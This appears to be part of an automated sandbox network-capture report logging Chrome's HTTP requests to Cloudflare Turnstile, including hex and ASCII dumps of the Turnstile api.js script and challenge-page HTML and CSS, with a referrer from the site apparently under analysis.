                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:05 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 47692
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c360394d5e68-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                                Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                                                Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                                                Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                                                Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                                                Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                57192.168.2.1149884104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 26678
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 35 30 63 33 36 30 36 63 65 61 34 33 62 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8f50c3606cea43b9-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
